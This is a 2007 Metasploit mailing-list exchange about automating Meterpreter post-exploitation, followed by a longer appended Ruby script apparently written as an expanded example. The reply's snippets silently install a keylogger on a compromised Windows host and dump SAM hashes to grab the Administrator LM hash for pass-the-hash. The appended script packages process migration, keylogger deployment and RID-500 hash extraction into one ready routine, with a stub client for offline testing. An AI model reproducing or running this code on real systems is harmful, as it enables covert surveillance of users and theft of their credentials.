Metasploit mailing list archives
Meterpreter AutoExec?
From: jerome.athias at free.fr (Jerome Athias)
Date: Sat, 10 Nov 2007 14:57:57 +0100
Hi,

The design of Meterpreter lets you do this sort of thing in an easy way: Meterpreter scripts! (Thanks to The Alien ;-p)

Look at /scripts/meterpreter/ and you'll find the migrate.rb script you need.

Then, to launch a new process, you'll use something like:

    # Start the uploaded keylogger installer and wait until it has exited
    myproc = client.sys.process.execute("C:\\keylog.exe", "/S")
    done = false
    until done
      sleep 5
      # Collect the PIDs currently running on the target
      pid_list = client.sys.process.processes.collect { |x| x["pid"] }
      # The installer is finished once its PID has disappeared from the list
      done = true unless pid_list.include?(myproc.pid)
    end
    print_status("Keylog installed")

To dump the LM hash of the Administrator account, use:

    # Load the priv extension, which provides sam_hashes
    client.core.use("priv")
    adm_name = adm_lanman = nil
    client.priv.sam_hashes.each do |h|
      # RID 500 is the built-in Administrator, whatever it has been renamed to
      if h.user_id == "500"
        adm_name   = h.user_name
        adm_lanman = h.lanman
      end
    end
    if adm_name
      print_status("LM hash for " + adm_name + " is " + adm_lanman) # pass-the-hash anyone?
    else
      print_status("No account with RID 500 found in the SAM dump")
    end

Then, ... just be creative & innovative!

My 2 euro cents
/JA
www.securinfos.info

Best regards to VV & the folks of MISC (don't forget about my website, guys ;-))

CybyDude wrote:
> Hi List!
>
> Does Meterpreter support some sort of AutoExec script that can be executed post-exploitation? I understand this sort of thing would be possible through Ruby scripts using the MSF/Meterpreter API. But does MSF specifically look for something like autoexec (like AUTOEXEC.BAT in good old DOS)?
>
> Basically, I'm interested in automating post-exploitation measures for client-side attacks, which may include:
>
> 1. Migration of the process to something safe before the user terminates IE/OE/FF
> 2. Dump hashes
> 3. Upload, deploy & init custom stuff like a keylogger
> 4. Dash off a mail to the pentester about the vulnerable machine
>
> Could someone please guide me in this regard?
>
> Regards n' Best Wishes
> CybyDude
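As an added example, not code from the thread or from the Metasploit project: the steps CybyDude lists and the two snippets in the reply, written as Ruby functions that take a Meterpreter-like client, plus a constructed stub client so the logic runs offline. The stub reproduces only the call shapes the reply uses (client.sys.process.processes / .execute / .migrate, client.core.use, client.priv.sam_hashes); its field names, the process list and the hash dump are assumptions, and the mail step is left out. Two things the reply's snippets do not handle are covered here: the wait loop is bounded by a timeout so a hung installer cannot stall the whole script, and the Administrator is picked by RID 500 with a check for the empty-LM marker, since a disabled LM hash is useless for pass-the-hash.

```ruby
# Added example (not the thread's or Metasploit's code). The StubClient below
# is a constructed stand-in for the real Meterpreter client object.

# LM hash of the empty password: when it appears, LM storage is disabled on the
# target and only the NT hash is usable for pass-the-hash.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"

# Choose a migration target by name; explorer.exe outlives the client-side
# application that was exploited, which is the point of migrating early.
def pick_migration_target(client, preferred = %w[explorer.exe svchost.exe])
  procs = client.sys.process.processes
  preferred.each do |name|
    hit = procs.find { |p| p["name"].to_s.downcase == name }
    return hit["pid"] if hit
  end
  nil
end

# Launch a program and poll until its PID leaves the process list, as in the
# reply, but bounded: true when it exited, false on timeout.
def run_and_wait(client, path, args, timeout: 60, interval: 5, sleeper: ->(s) { sleep s })
  handle = client.sys.process.execute(path, args)
  waited = 0
  loop do
    pids = client.sys.process.processes.collect { |x| x["pid"] }
    return true  unless pids.include?(handle.pid)
    return false if waited >= timeout
    sleeper.call(interval)
    waited += interval
  end
end

# Select the built-in Administrator by RID 500 rather than by name or position
# in the dump (the account may be renamed). Returns a hash or nil.
def builtin_admin(client)
  client.core.use("priv")
  entry = client.priv.sam_hashes.find { |h| h.user_id.to_s == "500" }
  return nil unless entry
  { name: entry.user_name, lm: entry.lanman, nt: entry.ntlm,
    lm_usable: entry.lanman.downcase != EMPTY_LM }
end

# The "autoexec" body: run the steps and return what happened.
def post_exploit(client, keylogger: "C:\\keylog.exe", sleeper: ->(s) { sleep s })
  target = pick_migration_target(client)
  client.sys.process.migrate(target) if target
  installed = run_and_wait(client, keylogger, "/S", sleeper: sleeper)
  { migrated_to: target, keylogger_installed: installed, admin: builtin_admin(client) }
end

# --- constructed stub; field names are assumptions, not the real API ---
class StubClient
  SamUser = Struct.new(:user_name, :user_id, :lanman, :ntlm)
  Core    = Struct.new(:loaded) do
    def use(ext)
      loaded << ext
      true
    end
  end
  Priv    = Struct.new(:sam_hashes)
  Sys     = Struct.new(:process)
  Handle  = Struct.new(:pid)

  attr_reader :core, :priv, :migrated_to

  def initialize(procs, sam_users, polls_until_exit: 2)
    @procs = procs
    @core = Core.new([])
    @priv = Priv.new(sam_users)
    @polls_until_exit = polls_until_exit
    @launched = nil
  end

  def sys; Sys.new(self); end          # client.sys.process resolves to self
  def migrate(pid); @migrated_to = pid; end

  def execute(path, _args)
    @launched = 4242                   # constructed PID for the launched program
    @procs << { "pid" => @launched, "name" => path }
    Handle.new(@launched)
  end

  # The launched process "exits" after polls_until_exit polls of the list.
  def processes
    if @launched
      @polls_until_exit -= 1
      @procs.reject! { |p| p["pid"] == @launched } if @polls_until_exit < 0
    end
    @procs.map(&:dup)
  end
end

# Constructed sample target: a renamed Administrator (RID 500) with LM disabled.
def sample_client(polls_until_exit: 2)
  procs = [{ "pid" => 1204, "name" => "explorer.exe" }, { "pid" => 2880, "name" => "iexplore.exe" }]
  users = [StubClient::SamUser.new("Guest", "501", EMPTY_LM, "31d6cfe0d16ae931b73c59d7e0c089c0"),
           StubClient::SamUser.new("Admin", "500", EMPTY_LM, "8846f7eaee8fb117ad06bdd830b7586c")]
  StubClient.new(procs, users, polls_until_exit: polls_until_exit)
end

if $PROGRAM_NAME == __FILE__
  p post_exploit(sample_client, sleeper: ->(_) {})
end
```

In a real script the stub is replaced by the `client` object the framework hands to scripts under /scripts/meterpreter/, and the `sleeper` default calls Kernel#sleep. Later framework versions answer the AutoExec question directly with the AutoRunScript handler option, which runs a script automatically when a session is created.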